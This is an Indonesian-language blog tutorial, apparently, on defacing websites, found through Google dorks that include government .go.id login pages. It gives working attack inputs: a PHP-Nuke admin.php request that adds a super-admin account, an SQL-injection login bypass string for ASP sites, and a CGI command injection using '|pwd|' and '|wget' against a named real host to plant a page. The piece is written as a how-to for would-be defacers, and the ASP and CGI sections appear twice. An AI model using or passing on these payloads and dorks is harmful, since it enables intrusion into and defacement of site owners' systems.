Deface situs php nuke pakai google. Coba search di google:
.com/nuke/index.php atau .org/nuke/index.php
Jika sudah ditemukan targetnya, tinggal ikuti langkah berikut :
1. http://www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)
2. Masukkan bug ini di belakang situs tadi :
?op=AddAuthor&add_aid=smartbekantan&add_name=God&add_pwd=render07&add_email=bekantan@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
misalnya : http://www.target.com/nuke/admin.php?
http://www.target.com/nuke/admin.php?op=AddAuthor&add_aid=smartbekantan&add_
name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Jika tidak bisa berarti situs tersebut sudah dipath oleh admin nya.
Tapi jika berhasil, maka di url/browsing akan muncul http://www.target.com/nuke/admin.php?op=mod_author
4. Login, dan masukan id & password tadi.
Masih ingat kan ?
id=smartbekantan => liat yg diatas tadi
password=render07 => liat yg diatas tadi. Nah kita sekarang sudah
masuk ke “Administration Menu” situs tersebut. Kamu sudah bisa utak atik dan menguasai website tersebut.
Deface asp dengan sql injection
1. buka browsing/url http://www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target http://www.situstarget.com/
login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya http://www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<<
page=”coart_frontpage.html|pwd|”
page=”coart_frontpage.html|wget” nya =’”>https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =”"> allinurl*.cgi *
page:.*html+site:.us atau http://www.google.co.id/
search?q=allinurl*.cgi%3Fpage%3D*.html
+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|
Mudah kan? Kamu sudah jadi seorang defacer sekarang :)
tapi ingat #Hacker not a destroyer :D
1. buka browsing/url http://www.google.co.id
2. ketik site:go.id login.asp
misal nya kita dapat target http://www.situstarget.com/
login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya http://www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<<
page=”coart_frontpage.html|pwd|”
page=”coart_frontpage.html|wget” nya =’”>https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =”"> allinurl*.cgi *
page:.*html+site:.us atau http://www.google.co.id/
search?q=allinurl*.cgi%3Fpage%3D*.html
+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|
Posting Komentar
Peraturan Berkomentar :
✔ Berkomentarlah Sesuai Artikel Diatas
✔ Untuk Berkomentar Gunakan (OpenID / Name URL / Google+)
✔ Berkomentarlah Menggunakan Bahasa Yang Jelas
✔ Relevan
✔ Sopan
✖ SPAM
✖ Link Aktif (Live Link)
✖ Promosi (Iklan)
✖ OOT (Out Of Topic)